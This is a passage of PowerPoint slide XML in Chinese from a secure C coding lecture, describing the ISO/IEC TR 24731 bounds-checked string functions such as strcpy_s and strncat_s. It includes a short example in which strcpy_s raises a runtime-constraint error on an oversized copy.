              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strncat_s()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代替</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strncat()</a:t>
            </a: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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29404351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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ISO/IEC “Security” TR 24731 Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82947" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓解</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓冲区溢出攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>默认保护与计划相关文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>不产生无结尾的字符串</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>不意外截断字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>保存空字符结尾的字符串数据类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>支持编译时检查</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>使失败显现</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>有一个统一的函数参数和返回类型模式</a:t>
            </a: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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24591858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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcpy_s()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>把字符从源字符串复制到目标字符数组，直到并包括终止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>errno_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcpy_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>char * restrict s1,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>rsize_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> s1max,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>const char * restrict s2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>类似，包含一个额外的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>rsize_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>参数类型来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>确定目标缓冲区</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>的最大长度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>只有当源字符串可以完全复制到目标缓冲区，且目标缓冲区没有发生溢出时，才算成功。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37858511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zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcpy_s()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>例子</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>int main(int argc, char* argv[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>char a[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>char b[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>char c[24];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>strcpy_s(a, sizeof(a), "0123456789abcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>strcpy_s(b, sizeof(b), "0123456789abcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>strcpy_s(c, sizeof(c), a);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>strcat_s(c, sizeof(c), b);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446468" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="2133600"/>
            <a:ext cx="4681538" cy="842963"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -24093"/>
              <a:gd name="adj2" fmla="val 85218"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcpy_s()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>失败并生成一个运行时约束错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3162119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6468"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="446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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ISO/IEC TR 24731 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>小结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>可在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Visual C++ 2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>中使用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
